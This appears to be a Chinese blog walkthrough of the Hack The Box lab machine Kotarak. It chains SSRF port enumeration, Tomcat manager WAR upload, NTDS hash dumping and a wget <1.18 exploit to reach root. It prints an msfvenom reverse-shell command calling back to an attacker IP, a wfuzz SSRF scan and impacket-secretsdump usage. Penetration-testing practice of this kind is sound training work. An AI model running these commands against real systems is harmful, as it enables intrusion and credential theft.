HackTheBox-Linux-Kotarak

靶机地址：https://www.hackthebox.eu/home/machines/profile/101

靶机难度：中级（5.0/10）

靶机发布日期：2017年10月22日

靶机描述：

Kotarak focuses on many different attack vectors and requires quite a few steps for completion. It is a great learning experience as many of the topics are not covered by other machines on Hack The Box.

请注意：对于所有这些计算机，我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，我概不负责。

一、信息收集

可以看到靶机的IP是10.10.10.55....

Nmap扫描发现OpenSSH，Apache Tomca和Apache Web服务器都开放着...

访问8080web是不完整的页面返回...直接爆破发现了manager目录...但是这里访问后还是错误页面...去60000看看

60000是提供了私有的web服务器...

当访问了60000后在访问8080mannger后发现跳到了用户登陆界面框...需要获得账号密码....

这边使用gubuster和dirb爆破了60000web服务页面...

存在很多有价值的信息...例如rever-status、url.php等...

niko枚举发现该页面容易受到远程SSRF（服务器端请求伪造）的攻击...

SSRF

启动burp并将请求/url.php?path=1发送到burp分析，原理SSRF允许我们查看内部服务器信息，尝试查看目录文件时，回复的是继续努力...SSRF还能查看本地监听的端口...22是存在的...枚举看看

wfuzz -c -z range,1-65535 --hl=2 http://10.10.10.55:60000/url.php?path=localhost:FUZZ

这里利用Wfuzz枚举了本地开放的端口...888

通过URL打开localhost:888，其中包含一些指向不同文件的链接...

进入备份发现是空白的...

回来检查源代码发现了?doc=backup，复制继续到web_url查看...

查看后还是空白的，我查看源代码发现了有用的信息...获得了账号密码...

利用用户名密码登陆了8080web界面...跳转到了Tomcat默认页面

Tomcat管理器UI具有一个小功能，它允许将.war文件部署到服务器...利用文件上传提权...

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.51 LPORT=6666 -f war> dayushell.war

这里利用MSF创建了.war的shell，上传成功提权...

这里发现数据通道差，需要stty调整下...

这里用户枚举发现存在Active Directory数据库文件.dit和.bin...下载到本地...

impacket-secretsdump -system 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin -ntds 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit LOCAL

Ntds.dit文件是一个数据库，用于存储Active Directory数据，包括有关用户对象，组和组成员身份的信息，它包括域中所有用户的密码哈希..

这是AD数据库文件...利用secretsdump来转储哈希值...

可以看到转储了所有用户对象组的哈希...

awk -F: '{print $4}' hash

继续转储...

页面爆破或者john爆破都行，获得了atanas和adminis..密码....

这里直接su提权...成功获得user_flag信息....

上传LinEnum.sh枚举...

枚举发现可以看到根目录信息...

进来查看后发现了两个文件...flag.txt和app.log

app获得了很重要的信息：

1、IP 10.0.3.133每2分钟利用GET调用一个名为archive.tar.gz的文件...

2、IP 10.0.3.133机器上的wget版本是1.16，容易受到攻击....

本地搜索wget存在的漏洞...40064EXP可利用...

wget <1.18当提供有恶意URL发送到恶意或受感染的Web服务器时，可以被诱骗保存攻击者提供的任意远程文件，并通过写入.wgetrc在当前目录下以及其他目录下保存任意内容和文件名...

直接利用该EXP即可....

根据漏洞利用PoC所示，创建一个包含以下内容的.wgetrc文件，然后启用了FTP服务器...

利用EXP写入简单shell....

authbind python exploit.py

这里需要利用authbind，因为靶机启用了authbind，authbind作用是root用户和授权用户只能绑定到1024以下的端口...

执行后，等待了5分钟左右...成功获得了反向外壳...获得了root_flag信息....

apache爆破+SSRF攻击+文件上传提权+靶机枚举+wget漏洞提权

由于我们已经成功得到root权限查看user和root.txt，因此完成这台中级的靶机，希望你们喜欢这台机器，请继续关注大余后期会有更多具有挑战性的机器，一起练习学习。

如果你有其他的方法，欢迎留言。要是有写错了的地方，请你一定要告诉我。要是你觉得这篇博客写的还不错，欢迎分享给身边的人。